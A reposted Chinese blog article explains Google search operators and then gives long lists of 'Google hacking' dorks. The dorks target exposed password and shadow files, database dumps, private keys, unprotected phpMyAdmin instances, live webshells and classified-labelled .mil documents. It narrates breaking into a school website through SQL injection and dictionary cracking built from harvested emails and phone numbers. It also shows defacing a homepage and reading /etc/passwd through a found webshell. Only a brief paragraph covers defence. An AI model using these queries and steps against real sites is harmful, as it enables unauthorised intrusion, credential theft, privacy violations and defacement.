【轉】黑客的google運用技巧整理

黑客的google運用技巧整理

搜索也是一門藝術
        說起Google,可謂無人不知無人不曉,其強大的搜索功能,可以讓你在瞬間找到你想要的一切。不過對於普通的用戶而言,Google是一個強大的搜索引擎;而對於黑客而言,則可能是一款絕佳的黑客工具。正因爲google的檢索能力強大,黑客可以構造特殊的關鍵字語法,使用Google搜索互聯網上的相關隱私信息。通過Google,黑客甚至可以在幾秒種內黑掉一個網站。這種利用Google搜索相關信息並進行入侵的過程就叫做Google Hack。
       在我們平時使用搜索引擎的過程中,通常是將需要搜索的關鍵字輸入搜索引擎,然後就開始了漫長的信息提取過程。其實Google對於搜索的關鍵字提供了多種語法,合理使用這些語法,將使我們得到的搜索結果更加精確。當然,Google允許用戶使用這些語法的目的是爲了獲得更加精確的結果,但是黑客卻可以利用這些語法構造出特殊的關鍵字,使搜索的結果中絕大部分都是存在漏洞的網站。
下面上科互聯網絡培訓學院先來看看Google的部分語法:

inurl:搜索包含有特定字符的URL。例如輸入“inurl:/admin_login”,則可以找到帶有admin_login字符的URL,通常這類網址是管理員後臺的登錄網址。


intext:搜索網頁正文內容中的指定字符,例如輸入“intext:上科互聯”。這個語法類似我們平時在某些網站中使用的“文章內容搜索”功能。這個就是把網頁中的正文內容中的某個字符做爲搜索條件,例如在google裏輸入:intext:動網,將返回所有在網頁正文部分包含"動網"的網頁。

 

intitle:搜索網頁標題中包含有特定字符的網頁。例如輸入“intitle:上科互聯”,這樣網頁標題中帶有上科互聯的網頁會被搜索出來。和上面那個intext差不多,搜索網頁標題中是否有我們所要找的字符,例如搜索:intitle:安全天使,將返回所有網頁標題中包含“安全天使”的網頁。同理allintitle也同intitle類似。
allintext:使用方法和intext類似.


Filetype:搜索指定類型的文件。例如輸入“filetype:PDF”,將返回PDF文檔。這個我要重點推薦一下,無論是撒網式攻擊還是我們後面要說的搜索指定類型的文件。例如輸入:filetype:doc,將返回所有以doc結尾的文件URL。當然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會更豐富。

Site:找到與指定網站有聯繫的URL。例如輸入“Site:www.sunghost.cn”。所有和這個網站有聯繫的URL都會被顯示。


cache:搜索google裏關於某些內容的緩存,有時候也許能找到一些好東西哦。


define:搜索某個詞語的定義。搜索:define:hacker,將返回關於hacker的定義。

 

info:查找指定站點的一些基本信息。


link:例如搜索:link:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL。

 

對了還有一些符號也是很有用的:
       + 把google可能忽略的字列如查詢範圍
       - 把某個字忽略
       ~ 同意詞
       . 單一的通配符
       * 通配符,可代表多個字母
       "" 精確查詢

 

黑客常用的語法

admin site:edu.cn
site:sunghsot.cn intext:管理|後臺|登錄|用戶名|密碼|驗證碼|系統|賬號|後臺管理|後臺登錄
site:sunghsot.cn intitle:管理|後臺|登錄|用戶名|密碼|驗證碼|系統|賬號|後臺管理|後臺登錄
inurl:login/admin/manage/admin_login/login_admin/system/boos/master/main/cms/wp-admin/sys|managetem|password|username
site:www.sunghost.cn inurl:file
site:www.sunghost.cn inurl:load
site:www.sunghost.cn inurl:php?id=
site:www.sunghost.cn inurl:asp?id=
site:www.sunghost.cn inurl:fck
site:www.sunghost.cn inurl:ewebeditor
inurl:ewebeditor|editor|uploadfile|eweb|edit
intext:to parent directory
intext:轉到父目錄/轉到父路徑
inurl:upload.asp
inurl:cms/data/templates/images/index/
intitle:powered by dedecms
index of/ppt
Filetype:mdb
site:www.sunghost.cn intext:to parent directory+intext.mdb
inurl:robots.txt

intitle:index.of "parent directory" 

index of /passwd
site:sunghost.cn filetype:mdb|ini|php|asp|jsp

其他相關指令:related,cache,info,define,link,allinanchor等。

語法在Google Hack中的作用

瞭解了Google的基本語法後,我們來看一下黑客是如何使用這些語法進行Google Hack的,這些語法在入侵的過程中又會起到怎樣的作用呢?

intitle
intitle語法通常被用來搜索網站的後臺、特殊頁面和文件,通過在Google中搜索“intitle:登錄”、“intitle:管理”就可以找到很多網站的後臺登錄頁面。此外,intitle語法還可以被用在搜索文件上,例如搜索“intitle:"indexof"etc/shadow”就可以找到Linux中因爲配置不合理而泄露出來的用戶密碼文件。

inurl
Google Hack中,inurl發揮的作用的最大,主要可以分爲以下兩個方面:尋找網站後臺登錄地址,搜索特殊URL。
尋找網站後臺登錄地址:和intitle不同的是,inurl可以指定URL中的關鍵字,我們都知道網站的後臺URL都是類似login.asp、admin.asp爲結尾的,那麼我們只要以“inurl:login.asp”、“inurl:admin.asp”爲關鍵字進行搜索,同樣可以找到很多網站的後臺。此外,我們還可以搜索一下網站的數據庫地址,以“inurl:data”、“inurl:db”爲關鍵字進行搜索即可。
尋找網站的後臺登錄頁面
搜索特殊URL:通過inurl語法搜索特殊URL,我們可以找到很多網站程序的漏洞,例如最早IIS中的Uncode目錄遍歷漏洞,我們可以構造“inurl:/winnt/system32/cmd exe?/c+dir”這樣的關鍵字進行搜索,不過目前要搜索到存在這種古董漏洞的網站是比較困難的。再比如前段日子很火的上傳漏洞,我們使用““inurl:upload.asp”或“inurl:upload_soft.asp”即可找到很多上傳頁面,此時再用工具進行木馬上傳就可以完成入侵。

intext
intext的作用是搜索網頁中的指定字符,這貌似在Google Hack中沒有什麼作用,不過在以“intext:to parent directory”爲關鍵字進行搜索後,我們會很驚奇的發現,無數網站的目錄暴露在我們眼前。我們可以在其中隨意切換目錄,瀏覽文件,就像擁有了一個簡單的Webshell。形成這種現象的原因是由於IIS的配置疏忽。同樣,中文IIS配置疏忽也可能出現類似的漏洞,我們用“intext:轉到父目錄”就可以找到很多有漏洞的中文網站。

隨意瀏覽網站中的文件
Filetype
Filetype的作用是搜索指定文件。假如我們要搜索網站的數據庫文件,那麼可以以“filetype:mdb”爲關鍵字進行搜索,很快就可以下載到不少網站的數據庫文件。當然,Filetype語法的作用不僅於此,在和其他語法配合使用的時候更能顯示出其強大作用。
Site
黑客使用Site,通常都是做入侵前的信息刺探。Site語法可以顯示所有和目標網站有聯繫的頁面,從中或多或少存在一些關於目標網站的資料,這對於黑客而言就是入侵的突破口,是關於目標網站的一份詳盡的報告。語法組合,威力加倍雖然上文中介紹的這幾個語法能各自完成入侵中的一些步驟,但是隻使用一個語法進行入侵,其效率是很低下的。Google Hack的威力在於能將多個語法組合起來,這樣就可以快速地找到我們需要的東西。下面我們來模擬黑客是如何使用Google語法組合來入侵一個網站的。

信息刺探
黑客想入侵一個網站,通常第一步都是對目標網站進行信息刺探。這時可以使用“Site:目標網站”來獲取相關網頁,從中提取有用的資料。

搜索相關頁面
下載網站的數據庫。搜索“Site:目標網站 Filetype:mdb”就可以尋找目標網站的數據庫,其中的Site語法限定搜索範圍,Filetype決定搜索目標。用這種方法有一個缺點,就是下載到數據庫的成功率較低。在這裏我們還可以採用另一種語法組合,前提是目標網站存在IIS配置缺陷,即可以隨意瀏覽站點文件夾,我們搜索“Site:目標網站 intext:to parent directory”來確定其是否存在此漏洞。在確定漏洞存在後,可以使用“Site:目標網站 intext:to parent directory+intext.mdb”進行數據庫的搜索。

找到網站數據庫
登錄後臺管理
下載到數據庫後,我們就可以從中找到網站的管理員帳戶和密碼,並登錄網站的後臺。對於網站後臺的查找,可以使用語法組合“Site:

目標網站 intitle:管理”或者“Site:目標網站 inurl:login.asp”進行搜索,當然我們可以在這裏進行聯想,以不同的字符進行搜索,這樣就有很大的
概率可以找到網站的後臺管理地址。接下去黑客就可以在後臺上傳Webshll,進一步提升權限,在此不再闡述。

利用其他漏洞
如果下載數據庫不成功,我們還可以嘗試其他的入侵方法。例如尋找上傳漏洞,搜索“Site:目標網站 inurl:upload.asp”。此外,我們還可以根據一些程序漏洞的特徵,定製出Google Hack的語句。
Google Hack可以靈活地組合法語,合理的語法組合將使入侵顯得易如反掌,再加入自己的搜索字符,Google完全可以成爲你獨一無二的黑客工具。

合理設置,防範Google Hack。合理設置網站Google Hack貌似無孔不入,實則無非是利用了我們配置網站時的疏忽。例如上文中搜索“intext:to parent directory”即可找到很多可以瀏覽目錄文件的網站,這都是由於沒有設置好網站權限所造成的。在IIS中,設置用戶訪問網站權限時有一個選項,叫做“目錄瀏覽”,如果你不小心選中了該項,那麼其結果就如上文所述,可以讓黑客肆意瀏覽你網站中的文件。這種漏洞的防範方法十分簡單,在設置用戶權限時不要選中“目錄瀏覽”選項即可。


下面開始說說實際應用
  以下內容均在google上搜索,對於一個居心叵測的攻擊者來說,可能他最感興趣的就是密碼文件了。而google正因爲其強大的搜索能力往往會把一些敏感信息透露給他們。用google搜索以下內容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd

  有時候因爲各種各樣的原因一些重要的密碼文件被毫無保護的暴露在網絡上,如果被別有用心的人獲得,那麼危害是很大的。同樣可以用google來搜索一些具有漏洞的程序,例如ZeroBoard前段時間發現個文件代碼泄露漏洞,可以用google來找網上使用這套程序的站點:

intext:ZeroBoard filetype:php

或者使用:
inurlutlogin.php?_zb_path= site:.jp
  來尋找我們所需要的頁面。phpmyadmin是一套功能強大的數據庫操作軟件,一些站點由於配置失誤,導致我們可以不使用密碼直接對phpmyadmin進行操作,我們可以用google搜索存在這樣漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
  還記http://www.xxx.com/_vti_bin/..%5... ystem32/cmd.exe?dir嗎?用google找找,你也許還可以找到很多古董級的機器。同樣我們可以用這個找找有其他cgi漏洞的頁面。
allinurl:winnt system32
  前面已經簡單的說過可以用google來搜索數據庫文件,用上一些語法來精確查找能夠獲得更多東西(access的數據庫,mssql、mysql的連接文件等等).舉個例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正確的apache+win32的服務器上經常出現這種情況,和上面的原理一樣,我們還可以用google來找後臺。
利用google完全是可以對一個站點進行信息收集和滲透的,下面我們用google對特定站點進行一次測試。
首先用google先看這個站點的一些基本情況(一些細節部分就略去了):
site:xxxx.com
  從返回的信息中,找到幾個該校的幾個系院的域名:
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
  順便ping了一下,應該是在不同的服務器.學校一般都會有不少好的資料,先看看有什麼好東西沒。
site:xxxx.com filetype:doc
  得到N個不錯的doc。
  先找找網站的管理後臺地址:
site:xxxx.com intext:管理
site:xxxx.com inurl:login
site:xxxx.com intitle:管理
  超過獲得2個管理後臺地址:
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
  還算不錯,看看服務器上跑的是什麼程序:
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服務器用的應該是IIS,上面用的是asp的整站程序,還有一個php的論壇a3服務器也是IIS,aspx+asp。web程序都應該是自己開發的。有論壇那就看看能不能遇見什麼公共的FTP帳號什麼的:
site:a2.xxxx.com intext:ftp://*:*
  沒找到什麼有價值的東西。再看看有沒有上傳一類的漏洞:
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
  在a2上發現一個上傳文件的頁面:
http://a2.xxxx.com/sys/uploadfile.asp
  用IE看了一下,沒權限訪問。試試注射,
site:a2.xxxx.com filetype:asp
  得到N個asp頁面的地址,體力活就讓軟件做吧,這套程序明顯沒有對注射做什麼防範,dbowner權限,雖然不高但已足矣,back a shell不太喜歡,而且看起來數據庫的個頭就不小,直接把web管理員的密碼暴出來再說,MD5加密過。一般學校的站點的密碼都比較有規律,通常都是域名+電話一類的變形,用google搞定吧。
site:xxxx.com //得到N個二級域名
site:xxxx.com intext:*@xxxx.com //得到N個郵件地址,還有郵箱的主人的名字什麼的
site:xxxx.com intext:電話 //N個電話
  把什麼的信息做個字典吧,掛上慢慢跑。過了一段時間就跑出4個帳號,2個是學生會的,1個管理員,還有一個可能是老師的帳號。登陸上去:
name:網站管理員
pass:a2xxxx7619 //說了吧,就是域名+4個數字要再怎麼提權那就不屬於本文討論訪問了,呵呵,到此爲止。
  這段時間在國外的一些google hack的研究站點看了看,其實也都差不多是一些基本語法的靈活運用,或者配合某個腳本漏洞,主要還是靠個人的靈活思維。國外對於google hack方面的防範也並不是很多,所以大家還是點到爲止,不要去搞破壞拉,呵呵。對於一些在win上跑apache的網管們應該多注意一下這方面,一個intitle:index of就差不多都出來了。
1.查找利用phpwebshell
intitle:"php shell*" "Enable stderr"filetype:php
(注:intitle—網頁標題 Enablestderr—UNIX標準輸出和標準錯誤的縮寫filetype—文件類型)。搜索結果中,你能找到很多直接在機器上執行命令的webshell來。如果找到的PHPSHELL不會利用,如果你不熟悉UNIX,可以直接看看LIST,這裏就不詳細說了,有很多利用價值。要說明的是,我們這裏搜索出來的一些國外的PHPSHELL上都要使用UNIX命令,都是system調用出來的函數(其實用百度及其他搜索引擎都可以,只是填寫搜索的內容不同)。這個PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句話就把首頁搞定了:
echo "召喚" > index.jsp
  現在看看首頁,已經被我們改成: "召喚"了。
  我們也可以用WGET上傳一個文件上去(比如你要替換的葉子吧)。然後executeCommand輸入 cat file> index.html or echo "" > file
echo "test" >> file
  這樣一條條打出來,站點首頁就成功被替換了。同樣的也可以
uname -a;cat /etc/passwd
  不過有點要注意,有些WEBSHELL程序有問題,執行不了的,
2.搜索INC敏感信息
  在google的搜索框中填入:
       Code:.org filetype:inc

 

收集的一些google最好的技巧


intitle:"index of" pwd.db                      直接搜索其對方的ftp或者root的密碼
"# -FrontPage-" inurl:service.pwd              FrontPage的密碼,不過需要L0pht或者john配合破解密碼
intitle:"index of" htpasswd                      一些/下的密碼相關的 文件
"access denied for user" "using password"    配合sql注射可以暴對方路徑。
intitle:"index of" inurl:ftp (pub | incoming) 配合pub公佈的內容,可以查看其系統版本和網段
Error 404    asp?= 1  / 0                搜索sql注射的,找韓國kr和瑞典se的肉雞,多是sa權限注射
intilte:"error occurred" ODBC request Where (select|insert)    找sql注射的,和肉雞的------------推薦
"ORA-00921: unexpected end of SQL command"
"A syntax error has occurred" filetype:ihtml
"You have an error in your SQL syntax near"
ext:asp  inurlmessages|details|login|default|register|admin)    -site:xxxxxxxxxxx.com  查找登陸入口
site:.com    filetype:asp    intitle:"tank" -inurl:product 找目標

---------------------------------------------------------------------------------------
site:.mil  filetype:doc classified          可以加日期的,比如:filetypeDF site:mil 2005-2006
      com            mdb  可以爲靈活運用,比如坦克的單詞,飛機的單詞
      gov            pdf        敏感域名isr.hqda.pentagon.mil
      org            ppt
----------------------------------------------------------------------------------------

intitle:upload inurl:upload intext:upload -forum -shop -support -wc
intitle: private, protected, secret, secure, winnt     
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"Certificate Practice Statement" inurlPDF | DOC) mil
filetype:mdb inurl:.mdb    mil
filetype:log inurl:"password.log"
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:pem intext:private  搜索加密密匙
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"    找肉雞,看admin密碼
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS   
filetype:url +inurl:"ftp://" +inurl:";@"      此技巧最好分開使用
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified    推薦
intitle:"index of" intext:welcome      如有pub和etc一般都有welcome
intitle:Index.of etc shadow
site:.gov filetype:sql
"HTTP_FROM=googlebot" googlebot.com "Server_Software="      好的很啊
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject    site:edu 2005
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
inurl:forward filetype:forward -cvs    找密碼和ftp最好的技巧
top secret site:mil
confidential site:mil

inurl:
private
protected
secret
secure
--------------------------------------------------------------------

filetype:xls username password email
"config.php"
service filetype:pwd (frontpage)
inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
ipsec filetype:conf
"mydomain.com" nessus report
"report generated by"
"ws_ftp.log"
inurl:server-info "Apache Server Information"
inurl:ssl.conf filetype:conf
ipsec.conf
Lotus Domino address books            用戶數據庫,重要
robots.txt        看目錄



filetype:url +inurl:"ftp://"  +inurl:"@"
         
filetype:cnf inurl:_vti_pvt access.cnf


allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"    推薦
"access denied for user" "using password"      mysql暴錯,暴出路徑
intitleogin intext:"RT is ? Copyright"      找登陸頁子
intitle:index.of WEB-INF              目錄
intitle:"Index of" config.php
"Index of /admin" + passwd
inurl:passwd.txt wwwboard|webadmin
master.passwd
filetype:cfg mrtg "target
" -sample -cvs -example    看MRTG的配置的
ext:ini Version=... password
filetype:cfm "cfapplication name" password
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:inc dbconn    推薦
"#mysql dump" filetype:sql
"allow_call_time_pass_reference" "ATH_INFO"
filetype:inc intext:mysql_connect
filetype:inc mysql_connect or mysql_pconnect
filetype:mdb inurl:users.mdb

filetype:pass pass intext:userid
filetype:properties inurl:db intext:password ]

filetype:sql ("values * MD" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:xls username password email    mil

htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak

inurljspdemos private protected secret secure

intitle:dupics inurladd.asp | default.asp | view.asp | voting.asp) -site:duware.com
inurl:config.php dbuname dbpass    phpnuke的漏洞
"Welcome to phpMyAdmin" " Create new database"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"    跟蹤
"phpMyAdmin" "running on" inurl:"main.php"
"robots.txt" "Disallow:" filetype:txt    可以查看漏洞
ext:reg "username=*" putty
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
ext:log "Software: Microsoft Internet Information Services *.*"
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net    泄露源代碼
haccess.ctl (one way)
haccess.ctl (VERY reliable)
intext:gmail invite intext:http://gmail.google.com/gmail/a
-------------------------------------------------------------------------------------
intitle:"Index of" upload size parent directory
intitle:"System Statistics" +"System and Network Information Center"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
"intitle:Index.Of /" stats  cgi-* etc
intitle:"Directory Listing For" intext:Tomcat -intitle:Tomcat      mil
intitle:"Index of *" inurl:"my shared folder" size modified
intitle:"index of" "parent directory" "desktop.ini" site:gov      NASA
"Index of /backup"
intitle:"Index of /" modified php.exe

intitle:"index of" -inurl:htm -inurl:html mp
intitle:"Index of" cfide
intitle:"index of" intext:"content.ie"
intitle:"index.of.personal"
intitle:"webadmin - /*" filetype:php directory filename permission
intitle:index.of (inurl:fileadmin | intitle:fileadmin)
intitle:index.of /AlbumArt_
intitle:index.of /maildir/new/
intitle:index.of abyss.conf
intitle:intranet inurl:intranet +intext:"human resources"
inurl:/tmp

filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)   

inurl:explorer.cfm inurl:(dirpath|This_Directory)



"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"AutoCreate=TRUE password=*"

"index of cgi-bin"
+htpasswd +WS_FTP.LOG filetype:log
filetype:cfg ks intext:rootpw -sample -test -howto    gov
config.inc.php                          偶自己發現地
site:mil admin grades
inurl:backup filetype:mdb
inurl:perl/printenv
inurldbc.ini ext:ini -cvs
"Index Of /network" "last modified"
filetype:mbx mbx intext:Subject      查看 新聞組

inurl:forward filetype:forward -cvs    找linux嚮導

inurl:php.ini filetype:ini
filetype:inc inc intext:setcookie

inurl:"CgiStart?page="
"Enter ip" inurl:"php-ping.php"
mail filetype:csv -site:gov intext:name
MySQL tabledata dumps
OWA Public Folders (direct view)
phpinfo()
private key files (.csr)
private key files (.key)

"Windows XP Professional" 94FBR
site:edu admin grades
site:mil admin grades
SQL data dumps
Squid cache server reports
inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx        Windows2003登陸

"Index of" rar r nfo Modified
filetype:ini Desktop.ini intext:mydocs.dll

filetype:php inurl:"viewfile" -"index.php" -"idfil

filetype:wsdl wsdl    關於xml的聚合
intitle:"phpremoteview" filetype:php "Name, Size, Type, Modify"  edu

inurl:" WWWADMIN.PL" intitle:"wwwadmin"

inurl:robpoll.cgi filetype:cgi

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章